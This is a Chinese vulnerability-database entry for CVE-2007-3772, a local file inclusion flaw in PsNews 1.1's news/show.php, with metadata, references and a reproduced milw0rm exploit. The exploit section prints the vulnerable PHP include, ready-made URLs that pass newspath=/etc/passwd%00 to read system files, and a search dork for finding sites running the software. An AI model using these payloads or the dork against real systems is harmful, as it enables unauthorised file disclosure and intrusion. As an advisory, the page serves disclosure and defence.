PsNews news/show.php目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113297 漏洞类型 路径遍历
发布时间 2007-07-12 更新时间 2007-07-15
CVE编号 CVE-2007-3772 CNNVD-ID CNNVD-200707-247
漏洞平台 PHP CVSS评分 6.4
|漏洞来源
https://www.exploit-db.com/exploits/4174
https://www.securityfocus.com/bid/85589
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-247
|漏洞详情
PsNews1.1版本的news/show.php中存在目录遍历漏洞。远程攻击者可以借助newspath参数中的一个..,包含和执行任意本地文件。
|漏洞EXP
#                                      o      [bug]     /"*._         _        #
#                 .                     .    .      .-*'`    `*-.._.-'/        #
#                                   o       o     < * ))     ,       (         #
#                            .           o          `*-._`._(__.--*"`.\        #
#                                                                              #
# vuln.: PsNews 1.1 (show.php newspath) Local File Inclusion                   #
# author: irk4z@yahoo.pl                                                       #
# download:                                                                    #
#   http://www.strefaphp.net/index.php?page=download&what=download&fid=12      #
# dork: "Powered by PsNews" ;]                                                 #

/news/show.php:
...
 if(eregi("://", $newspath)){
 	die("Nieautoryzowany dostęp!");
 }
 if(!isset($newspath)){
	 $newspath = "news";
 }
 include("$newspath/functions.php");
...

# exploit:

 http://[site]/[path]/news/show.php?newspath=/etc/passwd%00
 http://[site]/[path]/news/show.php?newspath=[file]%00


# greetz: cOndemned, DooMRiderZ vx team (great zin :D), polish underground :*

# milw0rm.com [2007-07-12]
|受影响的产品
PSnews PSnews 1.1
|参考资料

来源:MILW0RM
名称:4174
链接:http://www.milw0rm.com/exploits/4174
来源:OSVDB
名称:37684
链接:http://osvdb.org/37684
来源:XF
名称:psnews-show-file-include(35374)
链接:http://xforce.iss.net/xforce/xfdb/35374